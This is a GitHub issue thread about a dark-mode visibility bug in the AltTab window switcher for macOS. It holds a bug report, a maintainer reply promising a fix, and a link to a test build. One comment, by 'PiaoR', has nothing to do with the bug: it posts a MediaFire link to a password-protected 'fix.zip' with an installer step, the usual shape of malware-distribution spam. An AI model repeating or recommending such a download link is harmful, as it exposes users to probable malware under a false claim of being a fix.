### ISSUE TITLE
In dark mode, it's hard to tell which window is active.

### ISSUE THREAD

**Issue by uuip** [lwouis/alt-tab-macos#3571]
**Describe the bug**

When both the operating system and browser are in dark mode, and the browser's open page is also black, it becomes difficult to tell which app is selected when using AltTab to switch between apps. In the window preview grid, it's hard to see which one is highlighted.

**Screenshots / video**
<img width="1638" alt="iShot_2024-08-28_13 39 31" src="https://github.com/user-attachments/assets/295c525a-d158-4734-ba0d-9514b253a407">

**Steps to reproduce the bug**
1. OS and Browser in dark mode, the currently active window is the browser, and a dark-themed website is open.
2. using AltTab switch window. 
3. The outermost layer of this screenshot is the browser page. In the screenshot, the fourth one is selected, but in reality, it's impossible to distinguish.

**Your environment**

* AltTab version: 6.72.0
* macOS version: 14.6.1

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lwouis** [comment]
Hi,

This visibility issue will be addressed soon, in the next release. It will be more visible by default, and you'll have a `High Visibility` option if you want it even clearer.

Thank you 🙇

**Comment by Allsochen** [comment]
https://github.com/lwouis/alt-tab-macos/issues/351#issuecomment-2307132012
你可以试试这个体验的版本
